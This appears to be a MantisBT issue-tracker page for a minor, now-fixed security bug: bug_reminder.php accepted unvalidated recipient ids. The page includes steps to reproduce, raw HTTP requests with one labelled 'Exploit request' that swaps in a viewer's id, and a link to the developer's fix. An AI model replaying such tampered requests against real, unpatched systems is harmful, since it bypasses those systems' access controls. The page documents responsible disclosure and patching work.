View Issue Details

IDProjectCategoryView StatusLast Update
0027276mantisbtsecuritypublic2020-09-25 14:53
Reporterd3vpoo1 Assigned Todregad  
PrioritynormalSeverityminorReproducibilityalways
Status closedResolutionfixed 
PlatformWindowsOSWindowsOS VersionWindows 10
Target Version2.24.3Fixed in Version2.24.3 
Summary0027276: Send reminder to viewer
Description

The endpoint bug_reminder.php has a parameter named &to%5B%5Dwhich seems doesn't have a validation. This allow to send a reminder to non admin member

Steps To Reproduce
  1. Login as your admin account

  2. Go to view.php?id=<SOME_BUG_ID>

  3. You can see a Send a reminder button

  4. Click it

  5. It will redirect to bug_reminder_page.php?bug_id=&lt;SOME_BUG_ID>

  6. Open your intercept

  7. Send it to someone on the list (This list is compose of developer/manager/admin)

You will get this request :

POST /mantisbt2/bug_reminder.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/bug_reminder_page.php?bug_id=11
Cookie: MANTIS_collapse_settings=|profile:0; MANTIS_PROJECT_COOKIE=1; MANTIS_VIEW_ALL_COOKIE=2; PHPSESSID=fkhqb98jkjojoog0of5kp9vt2c; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=X8lSnACahG7eXY5WEe7jushrng-oAuooyCseXXV-OBBLqskYb8r3sWKBHo5PY0YB; MANTIS_BUG_LIST_COOKIE=11%2C10%2C9%2C4%2C7%2C6%2C3%2C2
Upgrade-Insecure-Requests: 1

bug_reminder_token=20200911Akplh5-HUbvUvWpH0OX0RmTxWjMKX3FD&bug_id=11&to%5B%5D=10&bugnote_text=
  1. Change the value of to%5B%5D to your viewer account in my case my viewer id value is 4

Exploit request

POST /mantisbt2/bug_reminder.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Origin: http://localhost
Connection: close
Referer: http://localhost/mantisbt2/bug_reminder_page.php?bug_id=11
Cookie: MANTIS_collapse_settings=|profile:0; MANTIS_PROJECT_COOKIE=1; MANTIS_VIEW_ALL_COOKIE=2; PHPSESSID=fkhqb98jkjojoog0of5kp9vt2c; MANTIS_secure_session=0; MANTIS_STRING_COOKIE=X8lSnACahG7eXY5WEe7jushrng-oAuooyCseXXV-OBBLqskYb8r3sWKBHo5PY0YB; MANTIS_BUG_LIST_COOKIE=11%2C10%2C9%2C4%2C7%2C6%2C3%2C2
Upgrade-Insecure-Requests: 1

bug_reminder_token=20200911Akplh5-HUbvUvWpH0OX0RmTxWjMKX3FD&bug_id=11&to%5B%5D=4&bugnote_text=

Exploit response

Additional Information

None

TagsNo tags attached.

Activities

d3vpoo1

d3vpoo1

2020-09-10 20:39

reporter   ~0064411

I forget to include the image..

default1.png (11,687 bytes)   
default1.png (11,687 bytes)   
d3vpoo1

d3vpoo1

2020-09-12 21:46

reporter   ~0064426

Any update on this?

dregad

dregad

2020-09-19 07:45

developer   ~0064451

PR https://github.com/mantisbt/mantisbt/pull/1703

Related Changesets

MantisBT: master-2.24 7fc2a11f

2020-09-19 03:43

dregad


Details Diff
Prevent sending reminders to unauthorized users

Adds a check in bug_reminder.php to ensure that all the recipients have
the required access level to receive them (reminder_receive_threshold).

Fixes 0027276
Affected Issues
0027276
mod - bug_reminder.php Diff File